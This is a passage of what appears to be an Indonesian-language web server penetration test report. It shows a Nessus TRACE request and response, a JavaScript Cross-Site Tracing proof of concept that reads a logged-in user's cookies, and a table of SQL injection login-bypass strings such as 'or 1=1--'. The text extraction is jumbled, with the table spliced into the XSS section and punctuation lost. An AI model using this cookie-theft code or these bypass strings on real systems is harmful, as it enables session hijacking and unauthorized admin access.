XSS vulnerability Penetration Test

8

3. Penetration Test

Tahapan penetration test menindaklanjuti hasil yang diperoleh dari proses scanning. Pada tool Nessus proses scanning dan penetration test dilakukan sekaligus.

3.1 XSS vulnerability

• XST Penetration test jenis vulnerability ini dilakukan dengan cara mengirimkan TRACE request kepada web server. TRACE request dikirimkan oleh tool Nessus adalah sebagai berikut: TRACE request : ------------------------------ TRACE Nessus1825069417.html HTTP1.1 Connection: Close Host: 172.18.78.53 Pragma: no-cache User-Agent: Mozilla4.0 compatible; MSIE 6.0; Windows NT 5.0 Accept: imagegif, imagex- xbitmap, imagejpeg, imagepjpeg, imagepng, Accept-Language: en Accept-Charset: iso-8859-1,,utf- 8 Respon yang diperoleh dari web server adalah sebagai berikut: ------------------------------ response from the remote server : ------------------------------ HTTP1.1 200 OK Date: Wed, 03 Mar 2010 18:06:31 GMT Server : Apache2.2.4 LinuxSUSE Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: messagehttp Tabel 7 String untuk menerobos halaman admin menggunakan teknik SQL Injection String Makna Hasil Pengujian or 1=1-- String ini akan dianggap seperti berikut or 1=1--, hal ini akan menyebabkan nilai nya selalu benar karena logika OR akan bernilai selalu benar jika salah satu nilainya bernilai benar. Hal ini menyebabkan hacker dapat masuk ke halaman admin Tidak berhasil masuk ke halaman administrator or 1=1 String ini akan dianggap seperti berikut or 1=1, hal ini akan menyebabkan nilai nya selalu benar karena logika OR akan bernilai selalu benar jika salah satu nilainya bernilai benar. Hal ini menyebabkan hacker dapat masuk ke halaman admin Tidak berhasil masuk ke halaman administrator or 1=1 String ini akan dianggap seperti berikut or 1=1, hal ini akan menyebabkan nilai nya selalu benar karena logika OR akan bernilai selalu benar jika salah satu nilainya bernilai benar. Hal ini menyebabkan hacker dapat masuk ke halaman admin Tidak berhasil masuk ke halaman administrator or 1=1 or = String ini akan dianggap seperti berikut or 1=1 or =, hal ini akan menyebabkan nilai nya selalu benar karena logika OR akan bernilai selalu benar jika salah satu nilainya bernilai benar. Hal ini menyebabkan hacker dapat masuk ke halaman admin Tidak berhasil masuk ke halaman administrator or a=a String ini akan dianggap seperti berikut or a=a, hal ini akan menyebabkan nilai nya selalu benar karena logika OR akan bernilai selalu benar jika salah satu nilainya bernilai benar. Hal ini menyebabkan hacker dapat masuk ke halaman admin Tidak berhasil masuk ke halaman administrator admin String ini akan menghapus statement SQL yang ada setelah tanda , sehingga hanya terjadi pengecekan pada username saja. Tidak berhasil masuk ke halaman administrator admin String ini akan menghapus statement SQL yang ada setelah tanda , sehingga hanya terjadi pengecekan pada username saja. Tidak berhasil masuk ke halaman administrator 9 TRACE Nessus1825069417.html HTTP1.1 Connection: Keep-Alive Host: 172.18.78.53 Pragma: no-cache User-Agent: Mozilla4.0 compatible; MSIE 6.0; Windows NT 5.0 Accept: imagegif, imagex- xbitmap, imagejpeg, imagepjpeg, imagepng, Accept-Language: en Accept-Charset: iso-8859-1,,utf- 8 Respon yang diperoleh menunjukkan bahwa metode TRACE didukung oleh web server target. Untuk mendapatkan cookie dari website dilakukan dengan cara mengeksekusi kode berikut ini di browser : script type=”textjavascript” function xssDomainTraceRequest{ var exampleCode = “var xmlHttp = new ActiveXObject\”Microsoft.XMLHTTP \”\;xmlHttp.open\”TRACE\”,\”htt p:target\”,false\;xmlHttp.send \;xmlDoc=xmlHttp.responseText\; alertxmlDoc\;”; var target = “http:target”; cExampleCode = encodeURIComponentexampleCode + ‘;top.close’; var readyCode = ‘font- size:expressionexecScriptdecode URIComponent“’ + cExampleCode + ‘”’; showModalDialogtarget, null, readyCode; } script INPUT TYPE=BUTTON OnClick=”xssDomainTraceRequest” VALUE=”Show Cookie Information Using TRACE” Kode tersebut dapat menampilkan cookie dari website target apabila sebelumnya client target pernah melakukan login ke halaman website target. • Web server manual Web server manual dapat di-browse dengan cara memasukkan URL http:targetmanual pada browser. Proses penetration test yang dilakukan hanya mengecek apakah web server manual dapat di browse atau tidak. • Directory indexing Directory indexing dapat di-browse dengan cara memasukkan URL http:targeticons pada browser. Proses penetration test yang dilakukan hanya mengecek apakah directory dapat di-browse atau tidak.

3.2 Denial of Service